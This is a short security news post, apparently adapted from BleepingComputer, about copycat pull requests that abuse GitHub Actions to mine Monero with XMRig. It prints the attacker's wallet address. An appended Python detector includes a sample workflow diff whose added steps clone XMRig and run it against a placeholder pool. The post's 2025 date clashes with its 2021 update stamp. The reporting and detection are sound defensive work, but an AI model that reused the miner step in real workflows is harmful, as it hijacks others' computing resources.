Copycat crypto


Author: Admin | 2025-04-28

A software engineer at Sonatype became aware of the copycat attack targeting multiple GitHub repositories and notified me.

[Image: Malicious copycat Pull Requests abusing GitHub Actions for a crypto-mining attack. Source: BleepingComputer]

The user account opening malicious Pull Requests (shown above) appears to have done so for over 50 legitimate repositories. This figure is in addition to the 90+ repositories targeted by the threat actor(s) thus far.

As analyzed by BleepingComputer, a variation of this attack pulls in the open-source XMRig crypto-miner right from XMRig's official GitHub repository.

The wallet address observed in this copycat attack was: 49eqpX3Sn2d5cfJTevgZLGZGQmcdE37QE4TMJDmDcJeCG8DUgkbS5znSsU35Pk2HC1Lt99EnSiP9g74XpUHzTgxw23n5CkB

A list of servers in the pool is shown below, in the ci.yml file modified by the attacker(s):

[Image: Copycat attacks spotted on GitHub with a different miner and wallet address. Source: BleepingComputer]

GitHub had stated to The Record that they were aware of this activity, which was being actively investigated.

This isn't the first time an attack leveraging GitHub infrastructure has abused GitHub Actions. Previously, another programmer had described an identical attack in which an attacker had filed a malicious Pull Request against Esposito's GitHub project.

Last year, BleepingComputer also reported on GitHub being abused to host the wormable botnet Gitpaste-12, which returned the following month with over 30 exploits.

But, unlike Gitpaste-12 or the Octopus Scanner malware, which targeted vulnerable projects and devices, as of now this particular attack seems to be solely abusing GitHub servers for its crypto-mining tasks.

Thanks to ANY.RUN for malware analysis VM access.

Update 3-Apr-21 9:42 AM ET: Added an update on the copycat attack discovered by a Sonatype engineer recently.
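As an added defensive example (not code from this post, from GitHub, or from Sonatype), the following checks a pull-request diff for the pattern described above: a workflow file altered to fetch XMRig and point a miner at a pool with a payout address. The indicator patterns, the pool-endpoint form, and the sample diff (with its placeholder wallet and pool host) are my assumptions, not values taken from the attack.

```python
import re

WORKFLOW_DIR = ".github/workflows/"  # scope: where the ci.yml edits described above landed
HUNK = re.compile(r"@@ -\d+(?:,\d+)? \+(\d+)")  # new-file start line of a hunk
INDICATORS = {  # heuristics, assumed from the attack described above
    "xmrig_fetch": re.compile(r"github\.com/xmrig/xmrig|\bxmrig\b", re.I),
    # Standard Monero address: '4', one of [0-9AB], then 93 base58 characters.
    "monero_wallet": re.compile(r"\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b"),
    "pool_endpoint": re.compile(r"stratum\+tcp://|(?:-o|--url)[ =]\S+:\d{2,5}\b"),
}

def scan_pr_diff(diff_text):
    """Return (path, new_line_no, indicator) for each flagged added line."""
    hits, path, new_ln = [], None, 0
    for line in diff_text.splitlines():
        if line.startswith("diff --git"):
            path = None  # a new file section begins
        elif line.startswith("+++ "):
            path = line[4:].removeprefix("b/")
        elif line.startswith("@@"):
            new_ln = int(HUNK.match(line).group(1))
        elif path is None or line.startswith(("-", "\\")):
            continue  # old-file-only lines carry no new-file line number
        else:
            if line.startswith("+") and path.startswith(WORKFLOW_DIR):
                for name, rx in INDICATORS.items():
                    if rx.search(line[1:]):
                        hits.append((path, new_ln, name))
            new_ln += 1  # context and added lines both advance the counter
    return hits

# Constructed sample PR: placeholder wallet in Monero address format, placeholder pool host.
WALLET = "4A" + "x" * 93
SAMPLE_DIFF = f"""\
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -10,2 +10,4 @@ jobs:
     steps:
-      - run: npm test
+      - run: |
+          git clone https://github.com/xmrig/xmrig.git
+          ./xmrig/xmrig -o pool.example.invalid:3333 -u {WALLET}
diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1 +1,2 @@
 # demo
+See also the xmrig project.
"""
```

The README change mentioning xmrig is deliberately not flagged: only added lines under the workflow directory are scored, which is where the ci.yml modification in this attack lands.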
